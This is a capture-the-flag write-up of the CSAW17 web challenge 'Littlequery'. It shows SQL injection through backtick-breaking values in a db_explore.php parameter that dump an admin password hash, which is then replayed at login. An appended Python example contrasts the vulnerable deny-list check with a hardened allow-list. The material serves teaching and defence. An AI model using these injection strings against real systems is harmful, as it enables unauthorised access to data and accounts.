Littlequery – Web – CSAW17

Littlequery is a web challenge with a login page:

The behaviour is interesting: when we tried to log in, the value of the HTML password input was replaced by the SHA-1 of the input by this JavaScript code:

$(".form-signin").submit(function () {
    var $password = $(this).find("input[type=password]");
    // (the rest of the handler is cut off in this write-up)
});

So there is a chance that when someone logs in, the SHA-1 of the password is calculated by the client and compared to the database on the server. We tried different SQL injections on the login form without success, so we searched for another way to exploit the database and took a look at robots.txt:

User-agent: *
Disallow: /api

Mhm, /api seems promising, so we went to the api folder and found a db_explorer.php:

There are two modes for db_explorer.php: schema and preview. Using schema, we were able to get the architecture of the database:

db_explore.php?mode=schema : {"dbs":["littlequery"]}
db_explore.php?mode=schema&db=littlequery : {"tables":["user"]}
db_explore.php?mode=schema&db=littlequery&table=user : {"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}

So we tried db_explore.php?mode=preview&db=littlequery&table=user to see all users, but got a nice "Database 'littlequery' is not allowed to be previewed." So we started playing with the parameters to understand how db_explorer.php works. Here are the different SQL injection attempts:

db_explore.php?mode=preview&db=littlequery.user&table=user : `littlequery.user`.`user` doesn't exist.
db_explore.php?mode=preview&db=littlequery`.`user&table=user : `littlequery`.`user`.`user` doesn't exist.
db_explore.php?mode=preview&db=littlequery`.`user`; -- &table=user : [{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]

And we got the SHA-1 of the admin's password, so by disabling JavaScript we could log in by putting the hash in the password field and get the flag: flag{mayb3_1ts_t1m3_4_real_real_escape_string?}
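
Why the preview-mode check failed and how to close it, as an added example that is not code from the challenge or from this write-up. The server source is not shown, so `preview_vulnerable` is an assumed model inferred from the error messages above; the function names, the `SELECT * FROM` query shape and the `("demo", "articles")` allow-list entry are constructed for illustration.

```python
import re

# Assumption: the write-up does not show db_explorer.php, so this is a model of
# preview mode inferred from the error messages quoted above.
DENIED_DBS = {"littlequery"}  # deny-list compared against the raw parameter

def preview_vulnerable(db, table):
    """Deny-list check, then identifiers wrapped in backticks unescaped."""
    if db in DENIED_DBS:
        raise PermissionError(f"Database '{db}' is not allowed to be previewed.")
    return f"SELECT * FROM `{db}`.`{table}`"

IDENT = re.compile(r"[A-Za-z0-9_]{1,64}")
# Constructed allow-list of (db, table) pairs that may be previewed.
PREVIEWABLE = {("demo", "articles")}

def quote_ident(name):
    """Quote a MySQL identifier: strict charset, and backticks doubled
    as defense in depth should the charset ever be relaxed."""
    if not IDENT.fullmatch(name):
        raise ValueError(f"invalid identifier: {name!r}")
    return "`" + name.replace("`", "``") + "`"

def preview_hardened(db, table):
    """Allow-list the exact pair first, then quote each identifier."""
    if (db, table) not in PREVIEWABLE:
        raise PermissionError("preview not allowed")
    return f"SELECT * FROM {quote_ident(db)}.{quote_ident(table)}"

def rejected(builder, db, table):
    """True if the builder refuses the request instead of returning SQL."""
    try:
        builder(db, table)
        return False
    except (PermissionError, ValueError):
        return True

# The three db values tried in the write-up, with table=user each time.
PAGE_INPUTS = ["littlequery.user", "littlequery`.`user", "littlequery`.`user`; -- "]

if __name__ == "__main__":
    for db in PAGE_INPUTS:
        print("vulnerable:", preview_vulnerable(db, "user"))
        print("hardened rejects:", rejected(preview_hardened, db, "user"))
```

A string-escaping function such as the one the flag alludes to does not neutralize backticks, so identifiers need their own validation and an allow-list rather than a deny-list on the raw parameter.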